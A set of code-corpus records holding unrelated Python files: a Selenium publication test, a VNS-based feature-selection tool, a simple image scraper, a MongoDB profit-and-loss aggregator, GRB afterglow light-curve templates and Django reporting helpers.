)\n","sub_path":"kitti_train.py","file_name":"kitti_train.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"548812875","text":"#Ensure that we can import the main testing library\nimport sys\nimport os\nimport random\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\nfrom selenium_tests.interfaces import login as loginPage\n\n#Testing library modules\nfrom selenium_tests.actors import *\nfrom selenium_tests.actions import *\nfrom selenium_tests.questions import *\n\n#Local test modules\nfrom actors import *\nfrom actions import *\nfrom questions import *\n\n#Selenium Webdriver libraries\nfrom selenium import webdriver\n\n#Testing code start\njames = James()\n\n#Login\njames.attemptsTo(login)\njames.mustBe(loggedIn)\njames.attemptsTo(gotoProjects)\njames.mustBe(atProjectsMain)\n\n#Edit\njames.attemptsTo(gotoFirstProject)\njames.mustBe(atInfo)\n\ndata = {}\ndata['short_file'] = '256x256.png'\ndata['filename'] = os.getcwd() + data['short_file']\ndata['title'] = 'Title {0}'.format(random.randint(0,65536))\ndata['abstract'] = 'Abstract {0}'.format(random.randint(0,65536))\ndata['description'] = 'Description {0}'.format(random.randint(0,65536))\ndata['authors'] = 'Jerry Huang'\ndata['short_image'] = '256x256.png'\ndata['imagename'] = os.getcwd() + data['short_image']\ndata['short_docs'] = 
'testfile.txt'\ndata['docsname'] = os.getcwd() + data['short_docs']\ndata['license'] = 'CC0 - Creative Commons'\ndata['tags'] = 'Tag{0}'.format(random.randint(0,65536))\ndata['release_notes'] = 'Notes {0}'.format(random.randint(0,65536))\n\njames.attemptsTo(gotoPublications)\njames.mustBe(atPublications)\njames.attemptsTo(startPublication)\n\njames.mustBe(atPublicationContent)\njames.attemptsTo(addPublicationFile)\njames.mustBe(atPublicationFileDialog)\njames.attemptsTo(selectPublicationFile(data))\njames.mustHave(publicationFileSelected(data))\njames.attemptsTo(gotoPublicationDescription)\n\njames.mustBe(atPublicationDescription)\njames.attemptsTo(setPublicationTitle(data))\ntime.sleep(5)\njames.attemptsTo(setPublicationAbstract(data))\ntime.sleep(5)\njames.attemptsTo(setPublicationDescription(data))\n\njames.mustBe(atPublicationAuthors)\njames.attemptsTo(addPublicationAuthor)\njames.mustBe(atPublicationAuthorDialog)\njames.attemptsTo(selectPublicationAuthor(data))\njames.mustHave(publicationAuthorAdded(data))\njames.attemptsTo(gotoPublicationExtras)\n\njames.mustBe(atPublicationExtras)\njames.attemptsTo(addPublicationImage)\njames.mustBe(atPublicationFileDialog)\njames.attemptsTo(selectPublicationFile(data))\njames.mustHave(publicationFileSelected(data))\njames.attemptsTo(addPublicationDocs)\njames.mustBe(atPublicationFileDialog)\njames.attemptsTo(selectPublicationDocs(data))\njames.mustHave(publicationDocsAdded(data))\njames.attemptsTo(gotoPublicationLicense)\n\njames.mustBe(atPublicationLicense)\njames.attemptsTo(addPublicationAuthor)\njames.mustBe(atPublicationLicenseDialog)\njames.attemptsTo(selectPublicationLicense(data))\njames.mustHave(publicationLicenseSelected(data))\njames.attemptsTo(agreeToLicenseTerms)\ntime.sleep(1)\njames.attemptsTo(gotoPublicationTags)\n\njames.mustBe(atPublicationTags)\njames.attemptsTo(populatePublicationTags(data))\ntime.sleep(1)\njames.attemptsTo(gotoPublicationNotes)\n\njames.mustBe(atPublicationNotes)\njames.attemptsTo(populatePublicationNotes(data))\ntime.sleep(1)\njames.attemptsTo(gotoPublicationReview)\n\njames.mustBe(atPublicationReview)\njames.attemptsTo(agreeToPublicationTerms)\ntime.sleep(1)\njames.attemptsTo(submitPublication)\n\njames.mustHave(publicationPublished)\njames.attemptsTo(gotoPublicationPage)\n\njames.mustBe(atPublicationAbout)\njames.shouldBe(matchingPublicationAbout(data))\njames.attemptsTo(gotoPublicationSupportingDocs)\n\njames.mustBe(atPublicationSupportingDocs)\njames.shouldBe(matchingPublicationSupportingDocs(data))\n\njames.report()\njames.finish()\nsys.exit()\n","sub_path":"com_projects/publication.py","file_name":"publication.py","file_ext":"py","file_size_in_byte":3671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"392050322","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 29 21:51:42 2018\n\n@author: bruno\n\"\"\"\n\nfrom modules.vns import VNS, Item\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_score\nimport sklearn.feature_selection as fs\nimport numpy as np\nimport copy\nfrom operator import attrgetter\nimport random\nimport argparse\nimport time\nimport pandas as pd\n\n### Function for formatting time in human readable format\ndef get_formatted_time(s):\n decimal_part = s - int(s)\n\n s = int(s)\n\n seconds = s % 60\n\n s = s // 60\n minutes = s % 60\n\n s = s // 60\n hours = s % 24\n\n days = s // 24\n\n if days:\n d = '%dd ' % days\n else:\n d = ''\n\n return '%s%02dh%02dm%02d.%ds' % (d, 
hours, minutes, seconds, decimal_part)\n\nclass SPItem(Item):\n def __init__(self, name, item_id, insertion_cost):\n super(SPItem, self).__init__(item_id, insertion_cost)\n self.name = name\n\n def __repr__(self):\n return repr((self.name, self.insertion_cost))\n\nclass SPProblem(object):\n def __init__(self, k, metric, seed, data, min_size, max_size, corr_threshold,\n maximise=True, min_possible=2):\n self.k = k\n self.metric = metric\n if seed < 0:\n self.seed = None\n else:\n self.seed = seed\n self.km = KMeans(n_clusters=self.k, random_state=self.seed, n_jobs=-1)\n self.labels = None\n self.data = data\n self.min_size = min_size\n self.max_size = max_size\n self.min_possible = min_possible\n self.max_possible = len(self.data.columns)\n self.maximise = maximise\n self.hash = {}\n self.hash_access = 0\n self.hash_add = 0\n\n ### constraints creation\n self.attributes = list(self.data.columns)\n self.constraints_feasibility = []\n self.constraints_build = None\n self.constraints_counts = {}\n self.corr_threshold = corr_threshold\n\n self.corr = None\n self.create_constraints()\n\n ### items creation\n self.variances = self.get_variances()\n self.items = []\n self.create_items()\n\n def get_num_hash(self):\n return len(self.hash)\n\n def create_constraints(self):\n for attr in self.attributes:\n self.constraints_counts[attr] = 0\n\n self.corr = self.data.corr()\n self.constraints_build = np.zeros((len(self.attributes), len(self.attributes)), dtype=int)\n for i in range(0, len(self.attributes)-1):\n for j in range(i+1, len(self.attributes)):\n if abs(self.corr[self.attributes[i]][self.attributes[j]]) >= self.corr_threshold:\n self.constraints_build[i][j] = 1\n self.constraints_build[j][i] = 1\n self.constraints_counts[self.attributes[i]] += 1\n self.constraints_counts[self.attributes[j]] += 1\n constraint = np.zeros(len(self.attributes), dtype=int)\n constraint[i] = 1\n constraint[j] = 1\n self.constraints_feasibility.append(constraint)\n self.constraints_feasibility = np.array(self.constraints_feasibility)\n #print('shape ', self.constraints_feasibility.shape)\n\n ### Get variances for attributes\n def get_variances(self):\n sel = fs.VarianceThreshold()\n sel.fit(self.data)\n return zip(self.attributes, sel.variances_)\n\n def create_items(self):\n # pair\n for pair in self.variances:\n cost = pair[1]*10 / (1 + self.constraints_counts[pair[0]])\n item_id = np.zeros(len(self.attributes), dtype=int)\n item_id[self.attributes.index(pair[0])] = 1\n self.items.append(SPItem(pair[0], item_id, cost))\n\n def check_hash(self, solution):\n self.hash_access += 1\n solution_hash = solution.get_hash()\n if solution_hash in self.hash:\n return self.hash[solution_hash]\n\n return None\n\n def add_to_hash(self, solution, evaluation):\n self.hash_add += 1\n solution_hash = solution.get_hash()\n self.hash[solution_hash] = evaluation\n\n def get_hash_access(self):\n return self.hash_access\n\n def get_hash_add(self):\n return self.hash_add\n\n def get_vector(self, solution):\n vector = copy.deepcopy(solution.items[0].id)\n for i in range(1, len(solution.items)):\n vector += solution.items[i].id\n\n return vector\n\n def precompute_violations(self, solution):\n vector = self.get_vector(solution)\n\n att_sel = []\n n_selected = 0\n for selected, attr in zip(vector, self.attributes):\n if selected:\n n_selected += 1\n att_sel.append(attr)\n\n if n_selected < self.min_size or n_selected > self.max_size:\n return len(self.constraints_feasibility)+1, att_sel\n else:\n violations = 0\n for i in 
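# Aside: the constraint-building rule in SPProblem.create_constraints above, in
# isolation. Any attribute pair whose absolute Pearson correlation meets a
# threshold becomes a "do not select both" constraint, encoded as a 0/1 indicator
# vector over the attributes (a self-contained sketch, not the original method).
import numpy as np
import pandas as pd

def correlated_pairs(df, threshold=0.75):
    corr = df.corr().abs().to_numpy()
    n = corr.shape[0]
    constraints = []
    for i in range(n - 1):
        for j in range(i + 1, n):
            if corr[i, j] >= threshold:
                row = np.zeros(n, dtype=int)
                row[i] = row[j] = 1  # attributes i and j conflict
                constraints.append(row)
    return np.array(constraints)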
range(len(self.constraints_feasibility)):\n if np.sum(np.bitwise_and(vector, self.constraints_feasibility[i])) >= 2:\n violations += 1\n\n return violations, att_sel\n\n ### cost function\n def cost(self, solution):\n evaluation = self.check_hash(solution)\n if evaluation is not None:\n return evaluation\n\n violations, att_sel = self.precompute_violations(solution)\n self.labels = self.km.fit_predict(self.data[att_sel])\n evaluation = silhouette_score(self.data[att_sel], self.labels, self.metric)\\\n - np.log(1 + violations)\n\n self.add_to_hash(solution, evaluation)\n\n return evaluation\n\nclass VNS_SetPack(VNS):\n def __init__(self, time, problem, n_neighborhood, max_iter, elite_size, const, invert, max_no_improv, verbose, *args):\n super(VNS_SetPack, self).__init__(time, problem, n_neighborhood, max_iter,\n elite_size, const, args, invert, max_no_improv, verbose)\n\n def number_solutions_hash(self):\n return self.problem.get_num_hash()\n\n def cost(self, solution):\n return self.problem.cost(solution)\n\n def check_feasibility(self, solution):\n latest = solution[-1]\n f = attrgetter('name')\n if self.problem.constraints_counts[latest.name]:\n index = self.problem.attributes.index(latest.name)\n for i, value in enumerate(self.problem.constraints_build[index]):\n if value:\n attr = self.problem.attributes[i]\n #for pos, obj in enumerate(self.rcl):\n # if attr == f(obj):\n # self.rcl.remove(self.rcl[pos])\n # break\n\n return True\n\n def reevaluate_rcl_items(self):\n pass\n\n def items_from_vector(self, vector):\n f = attrgetter('name')\n new_items = []\n for bit, attr in zip(vector, self.problem.attributes):\n if bit:\n for item in self.items:\n if attr == f(item):\n new_items.append(copy.deepcopy(item))\n break\n\n return new_items\n\n def analyse_vector(self, vector):\n item_count = 0\n zeros = []\n ones = []\n for i,item in enumerate(vector):\n item_count += item\n if item:\n ones.append(i)\n else:\n zeros.append(i)\n\n return item_count, ones, zeros\n\n def get_neighbor(self, solution):\n '''vector = self.problem.get_vector(solution)\n item_count, ones, zeros = self.analyse_vector(vector)\n proximity = int(self.ls_count / self.max_no_improv * 100)\n\n if item_count <= 2:\n flip_index = random.choice(zeros)\n vector[flip_index] = 1\n elif proximity < 80:\n flip_index = random.randint(0, len(vector)-1)\n vector[flip_index] = (0, 1)[vector[flip_index] == 0]\n elif item_count == 3:\n flip_index = flip_index2 = random.choice(zeros)\n vector[flip_index] = 1\n while flip_index2 == flip_index:\n flip_index2 = random.randint(0, len(vector)-1)\n vector[flip_index2] = (0, 1)[vector[flip_index] == 0]\n else:\n flip_indexes = random.sample(range(len(vector)), 2)\n vector[flip_indexes[0]] = (0, 1)[vector[flip_indexes[0]] == 0]\n vector[flip_indexes[1]] = (0, 1)[vector[flip_indexes[1]] == 0]\n\n\n return self.items_from_vector(vector)'''\n pass\n\n### Function to print a solution\ndef print_solution(solution):\n s = 'solution: ['\n f = attrgetter('name')\n att_sel = [f(item) for item in solution.items]\n print(att_sel)\n s += ', '.join(str(e) for e in att_sel) + '], evaluation: %f' % (solution.evaluation)\n\n print(s)\n\ndef save_solutions(vns, data, time, max_gen_reached, args):\n dic = vars(args)\n\n s = 'File %s\\n' % dic['csv_file']\n\n s += 'elapsed_time;max_gen_reached\\n'\n s += '%f;%s\\n' % (time, str(max_gen_reached))\n\n items = []\n for param in sorted(dic.keys()):\n if param != 'csv_file':\n items.append(param)\n items = ';'.join(items) + '\\n'\n s += items\n\n items = []\n for param 
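# Aside: the check_hash/add_to_hash bookkeeping above is a hand-rolled memo table
# keyed on a solution hash. The same idea in a compact, reusable form (assumes
# solutions expose a stable get_hash(), as in this module):
class MemoizedCost(object):
    def __init__(self, cost_fn):
        self.cost_fn = cost_fn
        self.cache = {}  # solution hash -> cached evaluation

    def __call__(self, solution):
        key = solution.get_hash()
        if key not in self.cache:
            self.cache[key] = self.cost_fn(solution)
        return self.cache[key]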
in sorted(dic.keys()):\n        if param != 'csv_file':\n            items.append(str(dic[param]))\n    items = ';'.join(items) + '\\n'\n    s += items\n\n    s += 'Elite\\n'\n\n    head = ['evaluation']\n    for i in range(len(data.columns)):\n        head.append(data.columns[i])\n    head = ';'.join(str(e) for e in head)\n    s += head + '\\n'\n\n    f = attrgetter('id')\n    for sol in vns.elite:\n        vector = np.zeros(len(data.columns), dtype=int)\n        for item in sol.items:\n            att_id = f(item)\n            vector += att_id\n\n        s += '%f;' % sol.evaluation\n        s += ';'.join([str(bit) for bit in vector]) + '\\n'\n\n    if args.lang == 'pt':\n        s = s.replace('.', ',')\n\n    row = [ 'Mean', 'Std', 'It_total', 'It_best', 'Time_best', 'Number_solutions_hash', 'Hash_access', 'Hash_add' ]\n    row = ';'.join(str(e) for e in row)\n\n    s += str(row) + '\\n'\n    mean, std = vns.mean_std_elite()\n    row = [ mean, std, vns.get_iteration(), vns.get_best_iteration(), vns.get_time_best(), vns.number_solutions_hash(), vns.problem.get_hash_access(), vns.problem.get_hash_add() ]\n    row = ';'.join(str(e) for e in row)\n\n    s += str(row)\n\n    fp = open(args.csv_file, 'w')\n    fp.write(s)\n    fp.close()\n\ndef return_funcs(str):\n    f = []\n    for x in str:\n        if x == 'a':\n            f.append('flip_index')\n        elif x == 'b':\n            f.append('add_index')\n        elif x == 'c':\n            f.append('sub_index')\n\n    return f\n\ndef main():\n    ### Parsing command line arguments\n    parser = argparse.ArgumentParser(description='Feature selection tool, using VNS (Problem Modeled as Set Packing)')\n    parser.add_argument('csv_file', help='csv file to save output data')\n    parser.add_argument('--lang', default='en', help='Whether use . or , as floating point number decimal separator in output. If lang=en, uses dot if lang=pt, uses comma (default=en)')\n    parser.add_argument('--k', type=int, default=10, help='Number of clusters (default=10)')\n    parser.add_argument('--seed', type=int, default=-1, help='Random seed (default=-1). Use -1 for totally uncontrolled randomness')\n    parser.add_argument('--metric', default='c', choices=['e', 'c'], help='Metric to optimize: e | c (silhouette with euclidean distance, silhouette with cosine distance) (default=c)')\n    parser.add_argument('--max_iter', type=int, default=300, help='Maximum Number of Iterations (default=300)')\n    parser.add_argument('--max_no_improv', '-mximp', type=float, default=0.2, help='Percentage of generations with no improvement to force VNS to stop (default=0.2)')\n    parser.add_argument('--elsize', default=10, type=int, help='Number of solutions to keep in the elite (default=10)')\n    parser.add_argument('--mins', type=int, default=3, help='Minimum size of solution (default=3)')\n    parser.add_argument('--maxs', type=int, default=6, help='Maximum size of solution (default=6)')\n    parser.add_argument('--corr_threshold', '-crth', type=float, default=0.75, help='Value for correlation threshold (absolute value). Used to create constraints (default=0.75)')\n    parser.add_argument('--verbose', '-v', action='store_true', help='Verbose execution of VNS (default=False)')\n    parser.add_argument('--dt', type=int, default=1, help='Choose data: 1 - wines | 2 - moba | 3 - seizure (default=1)')\n    parser.add_argument('--const', type=int, default=1, help='Choose constructive method: 1 - Value | 2 - Cardinality (default=1)')\n    parser.add_argument('--time', type=int, default=7200, help='Maximum execution time. 
| 60 = 60s | 3600 = 1h | (default=7200s)')\n    parser.add_argument('--invert', type=int, default=0, help='Invert functions (default=0)')\n    parser.add_argument('--n_neighborhood', type=int, default=3, help='(default=3)')\n    parser.add_argument('--funcs', default='abc', help='Select funcs: a -> func1, b -> func2... (default=abc)')\n\n    args = parser.parse_args()\n\n    ### Loading data\n    if args.dt == 1:\n        json_file = 'modules/databases/vinhos/wine_normalized_no_outlier.json'\n    elif args.dt == 2:\n        json_file = 'modules/databases/moba-gabriel/data_normalized_no_outlier.json'\n    elif args.dt == 3:\n        json_file = 'modules/databases/convulsao/seizure_normalized_no_outlier.json'\n\n    data = pd.read_json(json_file)\n\n    if args.metric == 'c':\n        maximise = True\n        problem = SPProblem(args.k,\n                            'cosine',\n                            args.seed,\n                            data,\n                            args.mins,\n                            args.maxs,\n                            args.corr_threshold,\n                            maximise=maximise)\n    else:\n        maximise = True\n        problem = SPProblem(args.k,\n                            'euclidean',\n                            args.seed,\n                            data,\n                            args.mins,\n                            args.maxs,\n                            args.corr_threshold,\n                            maximise=maximise)\n\n    f = return_funcs(args.funcs)\n\n    vns = VNS_SetPack(args.time, problem, args.n_neighborhood, args.max_iter, args.elsize, args.const, args.invert, args.max_no_improv, args.verbose, f)\n\n    ### Executing VNS\n    start_time = time.time()\n    max_gen_reached = vns.run()\n    elapsed_time = time.time() - start_time\n\n    print('\\nElite:')\n    for s in vns.get_elite():\n        print_solution(s)\n\n    print('\\nBest solution found', end=' ')\n    print(vns.get_best())\n\n    print('\\nTotal elapsed time: %s' % (get_formatted_time(elapsed_time)))\n\n    if not max_gen_reached:\n        print('\\nStopped after %d generations without improvement.\\n' % int(args.max_no_improv * args.max_iter))\n\n    \"\"\"print('Mean, std: ', vns.mean_std_elite())\n    print('Iterations total: ', vns.iteration)\n    print('Iteration best: ', vns.best_iteration)\n    print('Number of solutions in the hash: ', vns.number_solutions_hash())\n    print('Hash access: ', vns.problem.hash_access)\n    print('Hash add: ', vns.problem.hash_add)\"\"\"\n\n    save_solutions(vns, data, elapsed_time, max_gen_reached, args)\n\nif __name__ == '__main__':\n    main()\n","sub_path":"bruno/vns_setpack.py","file_name":"vns_setpack.py","file_ext":"py","file_size_in_byte":15378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"565666200","text":"#!/usr/bin/python\n# coding=utf-8\n\n\"\"\"\nAn image-scraping program written in Python.\n\"\"\"\n\nimport os\nimport urllib2\nfrom bs4 import BeautifulSoup\nfrom urlparse import urlsplit\n\n\ndef catch_pic(url):\n    # urlopen returns a file-like object for the URL, which supports file-style operations\n    html = urllib2.urlopen(url)\n    # parse the HTML document behind this file-like object\n    bs = BeautifulSoup(html, 'lxml')\n    # find all img tags\n    for i in bs.find_all('img'):\n        # pass in the img tag's src attribute, i.e. the image URL\n        down_pic(i['src'])\n\n\ndef down_pic(url):\n    # read the image from its URL\n    img = urllib2.urlopen(url).read()\n    # urlsplit breaks the url into 5 parts; the third one is the path\n    file_name = os.path.basename(urlsplit(url)[2])\n    output = open(file_name, 'wb')\n    output.write(img)\n    output.close()\n\n    # with open(file_name,'wb') as f:\n    #     f.write(img)\n\n\nif __name__ == \"__main__\":\n    catch_pic('http://tieba.baidu.com/p/2166231880')\n","sub_path":"catch_pic.py","file_name":"catch_pic.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"447283522","text":"import pymongo\r\nfrom pymongo import MongoClient\r\nimport datetime\r\nimport time\r\nfrom flask import Flask\r\nfrom flask_socketio import SocketIO\r\nimport socket\r\n\r\ndate = 
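# Aside: catch_pic.py above is Python 2 (urllib2, urlparse). A hedged Python 3
# counterpart using requests + BeautifulSoup (both third-party, as already
# imported by that script); a sketch, not a drop-in replacement:
import os
from urllib.parse import urlsplit
import requests
from bs4 import BeautifulSoup

def catch_pics(url):
    soup = BeautifulSoup(requests.get(url, timeout=30).text, 'lxml')
    for img in soup.find_all('img'):
        src = img.get('src')
        if not src:
            continue  # skip img tags without a usable src attribute
        file_name = os.path.basename(urlsplit(src).path)
        with open(file_name, 'wb') as f:
            f.write(requests.get(src, timeout=30).content)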
datetime.date.today()\r\n\r\nclient = MongoClient()\r\n\r\ntry:\r\n    db = client[\"finalpnl\"]\r\n    collec = f\"finalpnl_{date}\"\r\n    db.create_collection(collec)\r\n    print(\"finalpnl is created\")\r\n\r\nexcept Exception as e:\r\n    print(e) \r\n\r\ntry:\r\n    db1 = client[\"clientWiseTotalPnl\"]\r\n    collec1 = f\"clientWiseTotalPnl_{date}\"\r\n    db1.create_collection(collec1)\r\n    print(\"clientWiseTotalPnl is created\")\r\n\r\nexcept Exception as e:\r\n    print(e) \r\n\r\n\r\nwhile True:\r\n    orders = db[collec].find()\r\n    for order in orders:\r\n        cID = order[\"clientID\"]\r\n        urPnl = order[\"strategywise_pnl\"]\r\n        \r\n        match = db[collec].find({\"clientID\": cID})\r\n        \r\n        newUrTotal = 0\r\n        if match:\r\n            for i in match:\r\n                newUrTotal = float(i[\"strategywise_pnl\"]) + newUrTotal\r\n         \r\n        matchInDb1 = db1[collec1].find_one({\"clientID\": cID})\r\n        post = {\"clientID\":cID, \"unRealized_pnl\": newUrTotal}\r\n        if matchInDb1:\r\n            db1[collec1].update({\"_id\":matchInDb1[\"_id\"]}, {\"$set\":post})\r\n\r\n        else:\r\n            db1[collec1].insert_one(post)\r\n\r\n\r\n        \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Symphony/unrealized/client_TotalPnl.py","file_name":"client_TotalPnl.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"149019595","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Main module.\"\"\"\n\nimport numpy as np\nfrom collections import OrderedDict\nfrom astropy.cosmology import Planck15 as cosmo\nfrom . import constants as cc\nimport gc\nimport sys\n\n\nclass Templates(object):\n    \"\"\" Power law, broken power law...\"\"\"\n\n    def __init__ (self, F0=500, t0=300,wvl0=6400):\n        \"\"\"\n        F0: flux normalisation in Jy\n        t0: time corresponding to the normalisation, in s\n        wvl0: wavelength corresponding to the normalisation, in angstrom\n        \"\"\"\n        self.F0=F0\n        self.t0=t0\n        self.wvl0=wvl0\n\n        return None\n\n    def SPL(self,wvl,t,alpha,beta):\n        \"\"\" Simple Power Law. wvl and t must have same dimensions as wvl0 and t0\"\"\"\n\n        F= self.F0 * (t/self.t0)**(-alpha) * (wvl/self.wvl0)**(beta)\n        return F\n\n    def BPL(self,wvl,t,alpha1,alpha2,beta,s):\n        \"\"\" Broken Power Law. 
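# Aside: the per-client summation loop in client_TotalPnl.py above re-scans the
# collection once per order; MongoDB can do the grouping server-side. A sketch
# with an aggregation pipeline ($toDouble needs MongoDB >= 4.0, and
# strategywise_pnl is assumed to be numeric or a numeric string):
pipeline = [
    {"$group": {
        "_id": "$clientID",
        "unRealized_pnl": {"$sum": {"$toDouble": "$strategywise_pnl"}},
    }},
]
for doc in db[collec].aggregate(pipeline):
    db1[collec1].update_one(
        {"clientID": doc["_id"]},
        {"$set": {"unRealized_pnl": doc["unRealized_pnl"]}},
        upsert=True,  # insert the client document if it does not exist yet
    )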
wvl and t must have same dimensions as wvl0 and t0 \"\"\"\n        #print (self.F0,self.wvl0,self.t0)\n        #print (wvl,t)\n        #print (alpha1,alpha2,beta,s)\n        F= self.F0 * (wvl/self.wvl0)**(beta) * ((t/self.t0)**(-s*alpha1) + (t/self.t0)**(-s*alpha2)) **(-1/s)\n        return F\n\n    def light_curve(self,wavelength,time,params,model='SPL'):\n        \"\"\" build light curves \"\"\"\n        time_series=np.atleast_1d(time)\n        wavelength=np.atleast_1d(wavelength)\n        lc=[]\n        t1=len(time)\n        wvl1=len(wavelength)\n        for t in range(t1):\n            sed=[]\n            for wvl in range(wvl1):\n                if model == 'SPL':\n                    alpha,beta= params\n                    SED=self.SPL(wavelength[wvl],time[t],alpha,beta)\n\n                elif model == 'BPL':\n                    alpha1,alpha2,beta,s=params\n                    SED=self.BPL(wavelength[wvl],time[t],alpha1,alpha2,beta,s)\n\n                sed.append( SED) # Flux in obs frame in same unit as F0\n\n            lc.append(sed) # Flux in obs frame in same unit as F0\n        return np.array(lc)\n    \n","sub_path":"pyGRBaglow/template_models.py","file_name":"template_models.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}{"seq_id":"318261190","text":"import nav.models as m\nfrom django.template.defaultfilters import floatformat\nfrom operator import itemgetter\n\ndef test():\n    return ('People Names',\n        [\n            {\n            'first_name':'monte',\n            'last_name': 'davis',\n            'age':42\n            },\n            {\n            'first_name':'ana',\n            'last_name': 'davis',\n            'age':26\n            }\n            \n        ],\n        ['first_name','last_name','age'],\n        ['First Name', 'Last Name', 'Age'])\n    \ndef staff_raw():\n    lofd=[]\n    for emp in m.Employee.objects.exclude(status=2):\n        try:\n            project=emp.project.project\n        except:\n            project='NULL'\n        row={\n            'employee_id':emp.employee_id,\n            'project':project,\n            'first_name':emp.first_name,\n            'last_name':emp.last_name,\n            'company':emp.company,\n            'manager':emp.manager,\n            'job_title':emp.job_title,\n            'status':emp.status,\n            'accrual_start_date':emp.accrual_start_date,\n            'position_date':emp.position_date,\n            'inactive_date':emp.inactive_date,\n            'termination_date':emp.termination_date,\n            'employment_type':emp.employment_type,\n            'contractor':emp.contractor,\n            'hours':floatformat(emp.hours,1),\n            'percentage':emp.percentage,\n            'short_id':emp.short_id\n            }\n        lofd.append(row)\n    lofd = sorted(lofd, key=itemgetter('short_id'), reverse=False) \n    \n    return ('Employees',\n        lofd,\n        [\n        'employee_id',\n        'project',\n        'first_name',\n        'last_name',\n        'company',\n        'manager',\n        'job_title',\n        'status',\n        'accrual_start_date',\n        'position_date',\n        'inactive_date',\n        'termination_date',\n        'employment_type',\n        'contractor',\n        'hours',\n        'percentage',\n        'short_id'\n        ],\n        [\n        'employee_id',\n        'project',\n        'first_name',\n        'last_name',\n        'company',\n        'manager',\n        'job_title',\n        'status',\n        'accrual_start_date',\n        'position_date',\n        'inactive_date',\n        'termination_date',\n        'employment_type',\n        'contractor',\n        'hours',\n        'percentage',\n        'short_id'\n        ])\n\n    \ndef job_lines_raw():\n    lofd=[]\n    for jjl in m.JobJournalLine.objects.filter(recurring_method__gt=0):\n        try:\n            row={\n                'job_id':jjl.job_id,\n                'job_no':jjl.job.job_no,\n                'description':jjl.job.description,\n                'customer_id':jjl.job.customer_id,\n                'customer_name':jjl.job.customer.name,\n                'person_responsible':jjl.job.person_responsible,\n                'project_code':jjl.project_code,\n                'line_no':jjl.line_no,\n                'mrr_code':jjl.mrr_code,\n                'recurring_method_literal':jjl.recurring_method_literal,\n                'type_literal':jjl.type_literal,\n                'line_type_literal':jjl.line_type_literal,\n                'no':jjl.no_code,\n                'prod_code':jjl.no_code[:2],\n                'line_amount':floatformat(jjl.line_amount,2),\n                
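# Aside: the nested loops in Templates.light_curve above can be collapsed with
# numpy broadcasting. A sketch for the simple power law, using the same
# F0/t0/wvl0 normalisation convention as that class (default exponents here are
# placeholders, not values from the original module):
import numpy as np

def spl_grid(wvl, t, F0=500, t0=300, wvl0=6400, alpha=1.0, beta=-1.0):
    wvl = np.atleast_1d(wvl)  # shape (W,)
    t = np.atleast_1d(t)      # shape (T,)
    # result has shape (T, W): one SED per epoch, like light_curve()
    return F0 * (t[:, None] / t0) ** (-alpha) * (wvl[None, :] / wvl0) ** beta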
'last_variable_amount':floatformat(jjl.last_variable_amount,2),\n 'conversion_rate':floatformat(jjl.conversion_rate,2),\n 'no_of_recurrencies':jjl.no_of_recurrencies,\n 'times_posted':jjl.times_posted,\n 'remaning_periods':jjl.remaning_periods,\n 'sold_date':jjl.sold_date,\n 'first_invoice_date':jjl.first_invoice_date,\n 'expiration_date':jjl.expiration_date,\n 'legal_entity':jjl.legal_entity,\n #'internal_customer':jjl.job.internal_customer\n \n }\n except:\n row={\n 'job_id':jjl.job_id,\n 'job_no':'n.a.',\n 'description':'n.a.',\n 'customer_id':'n.a.',\n 'customer_name':'n.a.',\n 'person_responsible':'n.a.',\n 'project_code':jjl.project_code,\n 'line_no':jjl.line_no,\n 'mrr_code':jjl.mrr_code,\n 'recurring_method_literal':jjl.recurring_method_literal,\n 'type_literal':jjl.type_literal,\n 'line_type_literal':jjl.line_type_literal,\n 'no':jjl.no_code,\n 'prod_code':'n.a.',\n 'line_amount':floatformat(jjl.line_amount,2),\n 'last_variable_amount':floatformat(jjl.last_variable_amount,2),\n 'conversion_rate':floatformat(jjl.conversion_rate,2),\n 'no_of_recurrencies':jjl.no_of_recurrencies,\n 'times_posted':jjl.times_posted,\n 'remaning_periods':jjl.remaning_periods,\n 'sold_date':jjl.sold_date,\n 'first_invoice_date':jjl.first_invoice_date,\n 'expiration_date':jjl.expiration_date,\n 'legal_entity':jjl.legal_entity,\n #'internal_customer':0\n }\n \n lofd.append(row) \n \n return ('Job Lines',\n lofd,\n [\n 'job_id',\n 'job_no',\n 'description',\n 'customer_id',\n 'customer_name',\n 'person_responsible',\n 'project_code',\n 'line_no',\n 'mrr_code',\n 'recurring_method_literal',\n 'type_literal',\n 'line_type_literal',\n 'no',\n 'prod_code',\n 'line_amount',\n 'last_variable_amount',\n 'conversion_rate',\n 'no_of_recurrencies',\n 'times_posted',\n 'remaning_periods',\n 'sold_date',\n 'first_invoice_date',\n 'expiration_date',\n 'legal_entity',\n #'internal_customer'\n ],\n [\n 'job id',\n 'Number',\n 'Description',\n 'Customer Id',\n 'Customer Name',\n 'Person Responsible',\n 'Project Code',\n 'line_no',\n 'MRR/SETUP',\n 'Fixed/Variable',\n 'Resource/Item',\n 'Contract/Schedule',\n 'No',\n 'Prod Code',\n 'Line amount',\n 'Last Variable Amount',\n 'Conversion rate',\n 'No of recurrencies',\n 'Times posted',\n 'Remaning periods',\n 'Sold date',\n 'First Invoice date',\n 'Expiration date',\n 'Legal Entity',\n #'Is Internal Customer'\n ])\n\n\ndef job_lines_raw_2():\n lofd=[]\n for jjl in m.JobJournalLine.objects.all():\n try:\n row={'job_num':jjl.new_job_name,'job_line_id':jjl.job_line_id}\n except:\n row={'job_num':'Does Not Exist','job_line_id':jjl.job_line_id}\n \n lofd.append(row) \n \n return ('Job Lines',\n 